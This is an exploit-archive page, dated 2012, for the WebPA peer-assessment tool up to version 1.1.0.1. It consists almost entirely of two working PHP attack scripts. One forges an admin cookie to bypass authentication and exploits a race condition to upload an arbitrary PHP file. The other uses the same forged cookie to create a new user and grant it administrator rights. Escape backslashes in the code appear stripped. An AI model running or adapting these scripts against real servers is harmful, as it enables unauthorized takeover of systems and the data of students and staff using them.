WebPA <= 1.1.0.1 Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WebPA <= 1.1.0.1 Multiple Vulnerabilities
# Published : 2012-08-24
# Author :
# Previous Title : web@all CMS 2.0 Multiple Vulnerabilities
# Next Title : vlinks 2.0.3 (site.php id parameter) SQL Injection
  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun  posdub[at]gmail.com ]
   [ 2012-08-23                              ]
 ##################################################
 # [ WebPA <= 1.1.0.1 ] Multiple Vulnerabilities  #
 ##################################################
 #
 # Script: "WebPA is an open source online peer assessment tool that enables
 #          every team member to recognise individual contributions to group work."
 #
 # Vendor:   http://www.webpaproject.com/
 # Download: http://sourceforge.net/projects/webpa/files/webpa/
 # Exploits were tested on:
 # Windows (Apache 2.2.17 + php 5.2.17)
 # Linux Centos (Apache 2.2.3 (CentOS) + php 5.2.17)
 #
 ##################################################
 # [ Arbitrary File Upload ]
 # PoC exploit Code:
 <?php
 error_reporting(0);
 set_time_limit(0);
 ini_set("default_socket_timeout", 5);

 function http_send($host, $port, $headers) {
  $fp = fsockopen($host, $port);
  if (!$fp) die('Connection -> fail');
  fputs($fp, $headers);
  return $fp;
 }

 function http_recv($fp) {
  $ret="";
  while (!feof($fp))
   $ret.= fgets($fp, 1024);
  fclose($fp);
  return $ret;
 }

 print "n#  WebPA v1.1.0.1 Arbitrary File Upload   #n";
 print "# Discovered by dun  posdub[at]gmail.com #nn";
 if ($argc < 3) {
  print "Usage:   php $argv[0] <host> <path>n";
  print "Example: php $argv[0] localhost /WebPA/n";
  die();
 }

 $host = $argv[1];
 $path = $argv[2];
 $tmp = 'tmp/';
 $temp_prefix='temp_';
 $up_file='phpinfo.php';
 $i=0;
 // preparing cookie for authentication bypass
 $cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array('user_id'=> '1', 'admin'=> '1')));
 // preparing POST data to perform the maximum delay before deleting temporary php file
 $payload = "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="uploadedfile"; filename="%s"rn";
 $payload .= "Content-Type: text/plainrnrn";
 $payload .= "<?php fwrite(fopen('%s','w'),'<?php phpinfo(); ?>'); ?>!".str_repeat("A",40)."rn";
 // making max lag, before unlink
 $payload .= str_repeat(str_repeat("A!",1)."!".str_repeat("A!",4)."rn",1000)."rn"; 
 $payload .= "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="rdoFileContentType"rnrn";
 $payload .= "2rn";
 $payload .= "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="rdoFileSeperator"rnrn";
 $payload .= "!rn";
 $payload .= "-----------------------------187161971819895--rn";
 $headers = "POST {$path}{$tmp}readfile.php HTTP/1.1rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closern";
 $headers .= "Cookie: AUTH_COOKIE={$cookie}rn";
 $headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895rn";
 $headers .= "Content-Length: ".strlen($payload)."rnrn";
 $headers .= sprintf($payload, $temp_prefix.$up_file, $up_file);
 fclose(http_send($host, 80, $headers));
 $headers = "GET {$path}{$tmp}%s HTTP/1.0rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closernrn";

 while(++$i<1000) {
    $res=http_recv(http_send($host, 80, sprintf($headers, $temp_prefix.$up_file)));
    if(!preg_match('/404 Not Found/',$res)) {
     $res=http_recv(http_send($host, 80, sprintf($headers, $up_file)));
      if(preg_match('/200 OK/',$res))
        print "Success!nnUploaded file: http://{$host}{$path}{$tmp}{$up_file}n";
      break;
    }
 }
 if($i==1000) print "Failed.n";
 ?>
 #
 ##################################################
 # [ Arbitrary Add Admin ]
 # PoC exploit Code:
 <?php
 error_reporting(0);
 set_time_limit(0);
 ini_set("default_socket_timeout", 5);

 function http_send($host, $port, $headers) {
  $fp = fsockopen($host, $port);
  if (!$fp) die('Connection -> fail');
  fputs($fp, $headers);
  return $fp;
 }

 function http_recv($fp) {
  $ret="";
  while (!feof($fp))
   $ret.= fgets($fp, 1024);
  fclose($fp);
  return $ret;
 }

 print "n# WebPA v1.1.0.1 Arbitrary Add Admin Exploit #n";
 print "# Discovered by dun    posdub[at]gmail.com  #nn";
 if ($argc < 5) {
  print "Usage:   php $argv[0] <host> <path> username passwordn";
  print "Example: php $argv[0] localhost /WebPA/ foo barn";
  die();
 }

 $host = $argv[1];
 $path = $argv[2];
 $newuser = $argv[3];
 $newpass = $argv[4];
 $cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array( 'user_id'=> '1', 'admin'=> '1' )));
 print "Adding a new user [ {$newuser} : {$newpass} ]n";
 $payload = "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="uploadedfile"; filename="user.csv"rn";
 $payload .= "Content-Type: text/csvrnrn";
 $payload .= "institutional_reference,forename,lastname,email,username,module_code,department_id,course_id,passwordrn";
 $payload .= "1,2,3,4,{$newuser},6,7,8,{$newpass}rnrn";
 $payload .= "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="rdoFileContentType"rnrn";
 $payload .= "2rn";
 $payload .= "-----------------------------187161971819895--rn";
 $headers = "POST {$path}admin/load/simple.php HTTP/1.1rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closern";
 $headers .= "Cookie: AUTH_COOKIE={$cookie}rn";
 $headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895rn";
 $headers .= "Content-Length: ".strlen($payload)."rnrn";
 $headers .= ($payload);
 fclose(http_send($host, 80, $headers));
 sleep(2);
 print "Granting admin privileges for user [ {$newuser} ]n";
 $headers = "GET {$path}admin/review/staff/index.php HTTP/1.0rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closern";
 $headers .= "Cookie: AUTH_COOKIE={$cookie}rnrn";
 preg_match_all('/php?u=(d+)/',http_recv(http_send($host, 80, $headers)) , $matches);
 if(!is_numeric(max($matches[1]))) die('Failed.');
 sleep(2);
 $payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=".urlencode('Save Changes');
 $headers = "POST {$path}admin/edit/index.php?u=".max($matches[1])." HTTP/1.0rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closern";
 $headers .= "Cookie: AUTH_COOKIE={$cookie}rn";
 $headers .= "Content-Type: application/x-www-form-urlencodedrn";
 $headers .= "Content-Length: ".strlen($payload)."rnrn";
 $headers .= ($payload);
 fclose(http_send($host, 80, $headers));
 print "Success!nn";
 print "http://{$host}{$path}login.phpn";
 print "user: {$newuser}n";
 print "pass: {$newpass}n";
 ?>
 #
 ### [ dun / 2012 ] ###############################